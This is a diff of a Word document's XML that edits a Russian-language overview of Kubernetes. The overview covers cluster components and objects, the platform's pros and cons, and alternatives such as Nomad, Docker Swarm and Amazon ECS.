+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">относят, главную ноду, рабочую ноду, </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>Pod</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">, </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>Service</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">, </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>Ingress</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">, </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>ConfigMap</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve">, </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>Secret</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">, </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>Volume</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2693,46 +2835,66 @@
           <w:ilvl w:val="0"/>
           <w:numId w:val="33"/>
         </w:numPr>
-      </w:pPr>
+        <w:ind w:left="1571"/>
+      </w:pPr>
+      <w:bookmarkStart w:id="10" w:name="_Toc231073607"/>
       <w:r>
         <w:t>Главная нода</w:t>
       </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t xml:space="preserve">Главная нода </w:t>
-      </w:r>
-      <w:r>
-        <w:t>–</w:t>
-      </w:r>
+      <w:bookmarkEnd w:id="10"/>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">Главная нода – центральный узел рабочего кластера </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>Kubernetes</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">, </w:t>
+      </w:r>
+      <w:r>
+        <w:t>который отвечает за взаимодействия рабочих нод с сервером, планировку контейнеров, логирование рабочих нод, а также резервного хранения данных.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve"> Основные компоненты главной ноды:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+      </w:pPr>
       <w:r>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
       <w:r>
-        <w:t xml:space="preserve">центральный узел рабочего кластера </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>Kubernetes</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">, </w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">который отвечает за </w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">взаимодействия рабочих нод с сервером, планировку контейнеров, логирование рабочих нод, а также </w:t>
-      </w:r>
-      <w:r>
-        <w:t>резервного хранения данных.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t xml:space="preserve"> Основные компоненты главной ноды:</w:t>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>API</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> – </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">контейнер с окружением кластера </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>K</w:t>
+      </w:r>
+      <w:r>
+        <w:t>8</w:t>
+      </w:r>
+      <w:r>
+        <w:t>;</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2746,22 +2908,40 @@
         <w:rPr>
           <w:lang w:val="en-US"/>
         </w:rPr>
-        <w:t>API</w:t>
+        <w:t>Controller</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>manager</w:t>
       </w:r>
       <w:r>
         <w:t xml:space="preserve"> – </w:t>
       </w:r>
       <w:r>
-        <w:t xml:space="preserve">контейнер с окружением кластера </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>K</w:t>
-      </w:r>
-      <w:r>
-        <w:t>8</w:t>
+        <w:t>контейнер</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:t>с</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:t>таймлайном</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:t>работы кластера</w:t>
       </w:r>
       <w:r>
         <w:t>;</w:t>
@@ -2778,8 +2958,22 @@
         <w:rPr>
           <w:lang w:val="en-US"/>
         </w:rPr>
-        <w:t>Controller</w:t>
-      </w:r>
+        <w:t>Scheduler</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> – </w:t>
+      </w:r>
+      <w:r>
+        <w:t>контейнер-планировщик, определяющий рабочую ноду для запуска контейнера</w:t>
+      </w:r>
+      <w:r>
+        <w:t>;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+      </w:pPr>
       <w:r>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
@@ -2787,130 +2981,75 @@
         <w:rPr>
           <w:lang w:val="en-US"/>
         </w:rPr>
-        <w:t>manager</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> – </w:t>
-      </w:r>
-      <w:r>
-        <w:t>контейнер</w:t>
-      </w:r>
+        <w:t>ETCD –</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> резервное хранилище кластера.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Beginingtitlelist"/>
+      </w:pPr>
+      <w:bookmarkStart w:id="11" w:name="_Toc231073608"/>
+      <w:r>
+        <w:t>Рабочая нода</w:t>
+      </w:r>
+      <w:bookmarkEnd w:id="11"/>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">Рабочая нода - придаточный узел кластера, в котором находится контейнеры для приложения. Управляется компонентами </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>Kubernetes.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>Основные компоненты рабочей ноды:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+      </w:pPr>
       <w:r>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
       <w:r>
-        <w:t>с</w:t>
-      </w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>Docker</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> контейнеры (приложение, БД)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+      </w:pPr>
       <w:r>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
-      <w:r>
-        <w:t>таймлайном</w:t>
-      </w:r>
-      <w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>Kubelet</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
         <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>работы кластера</w:t>
-      </w:r>
-      <w:r>
-        <w:t>;</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListParagraph"/>
-      </w:pPr>
-      <w:r>
-        <w:lastRenderedPageBreak/>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>Scheduler</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> – </w:t>
-      </w:r>
-      <w:r>
-        <w:t>контейнер-планировщик, определяющий рабочую ноду для запуска контейнера</w:t>
-      </w:r>
-      <w:r>
-        <w:t>;</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListParagraph"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>ETCD –</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> резервное хранилище кластера.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Beginingtitlelist"/>
-      </w:pPr>
-      <w:r>
-        <w:t>Рабочая нода</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t xml:space="preserve">Рабочая нода - придаточный узел кластера, в котором находится контейнеры для приложения. Управляется компонентами </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>Kubernetes.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>Основные компоненты рабочей ноды:</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListParagraph"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>Docker</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> контейнеры (приложение, БД)</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListParagraph"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve">Kubelet </w:t>
       </w:r>
       <w:r>
         <w:t>процесс</w:t>
@@ -2934,9 +3073,6 @@
           <w:numId w:val="0"/>
         </w:numPr>
         <w:ind w:left="709"/>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
       </w:pPr>
       <w:r>
         <w:t xml:space="preserve">Для тонкой настройки рабочих нод существуют компоненты </w:t>
@@ -2958,16 +3094,19 @@
           <w:ilvl w:val="0"/>
           <w:numId w:val="34"/>
         </w:numPr>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
+        <w:ind w:left="1571"/>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:bookmarkStart w:id="12" w:name="_Toc231073609"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t>Pod</w:t>
       </w:r>
+      <w:bookmarkEnd w:id="12"/>
     </w:p>
     <w:p>
       <w:r>
@@ -3002,12 +3141,15 @@
           <w:lang w:val="en-US"/>
         </w:rPr>
       </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
+      <w:bookmarkStart w:id="13" w:name="_Toc231073610"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:t>Service</w:t>
       </w:r>
+      <w:bookmarkEnd w:id="13"/>
     </w:p>
     <w:p>
       <w:r>
@@ -3020,10 +3162,7 @@
         <w:t xml:space="preserve"> – </w:t>
       </w:r>
       <w:r>
-        <w:t>абстракция, находящаяся над подами</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">, которая обеспечивает коммуникацию между этими подами, а также имеет возможность выделить для нескольких подов статический </w:t>
+        <w:t xml:space="preserve">абстракция, находящаяся над подами, которая обеспечивает коммуникацию между этими подами, а также имеет возможность выделить для нескольких подов статический </w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
@@ -3044,12 +3183,14 @@
       <w:pPr>
         <w:pStyle w:val="Beginingtitlelist"/>
       </w:pPr>
+      <w:bookmarkStart w:id="14" w:name="_Toc231073611"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t>Ingress</w:t>
       </w:r>
+      <w:bookmarkEnd w:id="14"/>
     </w:p>
     <w:p>
       <w:r>
@@ -3096,6 +3237,7 @@
           <w:lang w:val="en-US"/>
         </w:rPr>
       </w:pPr>
+      <w:bookmarkStart w:id="15" w:name="_Toc231073612"/>
       <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
@@ -3103,6 +3245,7 @@
         </w:rPr>
         <w:t>ConfigMap</w:t>
       </w:r>
+      <w:bookmarkEnd w:id="15"/>
       <w:proofErr w:type="spellEnd"/>
     </w:p>
     <w:p>
@@ -3148,38 +3291,757 @@
           <w:lang w:val="en-US"/>
         </w:rPr>
       </w:pPr>
+      <w:bookmarkStart w:id="16" w:name="_Toc231073613"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t>Secret</w:t>
       </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
+      <w:bookmarkEnd w:id="16"/>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>Secret</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> – </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">объект кластера, который служит для хранения конфидециальных данных с возможностью их использования. Все данные </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>secrets</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">хранятся в </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>ETCD</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:t>сервера в незашифрованном виде.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Beginingtitlelist"/>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:bookmarkStart w:id="17" w:name="_Toc231073614"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>Volume</w:t>
+      </w:r>
+      <w:bookmarkEnd w:id="17"/>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>Volume</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> – </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">объект </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>Kubernetes</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">, </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">который служит для связи с внешними дисками машины ноды. </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>Volume</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">предназначен для локального хранения информации внутри ноды. Также объект </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>Volume</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">находитя вне самого кластера </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>Kubernetes</w:t>
+      </w:r>
+      <w:r>
+        <w:t>.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Beginingtitlelist"/>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:bookmarkStart w:id="18" w:name="_Toc231073615"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>Deployment</w:t>
+      </w:r>
+      <w:bookmarkEnd w:id="18"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:eastAsia="ru-RU"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:t>Deployment - высокоуровневый объект, описывающий желаемое поведение группы подов и управляющий их жизненным циклом.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Beginingtitlelist"/>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:bookmarkStart w:id="19" w:name="_Toc231073616"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>STS</w:t>
+      </w:r>
+      <w:bookmarkEnd w:id="19"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:eastAsia="ru-RU"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:t>STS (StatefulSet) - объект kubernetes, который связывает БД из нод с контейнерами приложений с основным хранилищем</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:t>.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading2"/>
+      </w:pPr>
+      <w:bookmarkStart w:id="20" w:name="_Toc231073617"/>
+      <w:r>
+        <w:t xml:space="preserve">Особенности, преимущества и недостатки </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>Kubernetes</w:t>
+      </w:r>
+      <w:bookmarkEnd w:id="20"/>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">Kubernetes имеет ряд преимуществ, благодаря которым он широко используется для управления контейнеризированными приложениями. Он позволяет </w:t>
+      </w:r>
+      <w:r>
         <w:lastRenderedPageBreak/>
-        <w:t>Secret</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> – </w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">объект кластера, который служит для хранения конфидециальных данных с возможностью их использования. Все данные </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>secrets</w:t>
+        <w:t>автоматизировать развертывание, масштабирование и поддержку приложений, а также обеспечивает более эффективное использование вычислительных ресурсов. Kubernetes особенно полезен в сложных инфраструктурах, где необходимо управлять большим количеством сервисов, обеспечивать отказоустойчивость и быстро выпускать новые версии программного обеспечения.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>К основным преимуществам Kubernetes относят:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="-0"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">автоматическое развертывание и управление контейнерами; </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="-0"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">возможность горизонтального масштабирования приложений; </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="-0"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">автоматическое восстановление контейнеров при сбоях; </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="-0"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">балансировку нагрузки между экземплярами приложения; </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="-0"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">поддержку rolling updates и rollback при обновлениях; </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="-0"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">переносимость приложений между разными средами: локальной, облачной и гибридной; </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="-0"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">эффективное использование ресурсов кластера; </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="-0"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">удобное управление конфигурациями и секретами; </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="-0"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">развитую экосистему инструментов и расширений; </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="-0"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">поддержку микросервисной архитектуры. </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>Однако Kubernetes имеет и недостатки. Несмотря на широкие возможности, эта платформа является достаточно сложной в освоении и эксплуатации. Для её эффективного использования требуются знания в области контейнеризации, сетей, безопасности, мониторинга и DevOps-практик. Кроме того, Kubernetes может быть избыточным решением для небольших проектов, где достаточно более простых инструментов.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>К недостаткам Kubernetes можно отнести:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="-0"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="38"/>
+        </w:numPr>
+        <w:ind w:left="709" w:firstLine="0"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">высокий порог входа для начинающих специалистов; </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="-0"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">сложность настройки и администрирования кластера; </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="-0"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">необходимость постоянного мониторинга и сопровождения; </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="-0"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">дополнительные расходы на инфраструктуру и поддержку; </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="-0"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">сложность диагностики ошибок и сетевых проблем; </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="-0"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">необходимость тщательной настройки безопасности; </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="-0"/>
+      </w:pPr>
+      <w:r>
+        <w:lastRenderedPageBreak/>
+        <w:t xml:space="preserve">избыточность для небольших и простых приложений; </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="-0"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">зависимость от квалификации команды DevOps/SRE; </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="-0"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">возможное усложнение архитектуры проекта; </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="-0"/>
+      </w:pPr>
+      <w:r>
+        <w:t>потребность в дополнительных инструментах для логирования, мониторинга и CI/CD.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading2"/>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:bookmarkStart w:id="21" w:name="_Toc231073618"/>
+      <w:r>
+        <w:t xml:space="preserve">Существующие аналоги </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>kubernetes</w:t>
+      </w:r>
+      <w:bookmarkEnd w:id="21"/>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">Существуют и другие решения оркестровки кластера контейнеров. К ним относят такие решения, как </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>Nomad</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">, </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>Docker</w:t>
       </w:r>
       <w:r>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
       <w:r>
-        <w:t xml:space="preserve">хранятся в </w:t>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>Swarm</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">, </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>Amazon</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>ECS</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> + </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>AWS</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>Fargate</w:t>
+      </w:r>
+      <w:r>
+        <w:t>.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+        <w:t>Nomad</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> — один из самых близких концептуальных конкурентов Kubernetes. Это scheduler и orchestrator для контейнеров, бинарников и batch-задач, который может работать в cloud, on-prem и гибридных окружениях.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+        <w:t>Docker Swarm mode</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> встроен в Docker Engine и позволяет управлять кластером Docker-нод как swarm-кластером. Docker прямо описывает Swarm mode как механизм для управления кластером Docker daemons и отмечает, что текущие версии Docker включают Swarm mode; при этом старый Docker Classic Swarm больше активно не развивается.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+        <w:t>Amazon ECS</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> — fully managed container orchestration service от AWS для деплоя, управления и масштабирования контейнеризированных приложений. Он глубоко интегрирован с AWS-экосистемой. </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+        <w:t>AWS Fargate</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> позволяет запускать контейнеры через ECS без управления серверами или EC2-кластерами</w:t>
+      </w:r>
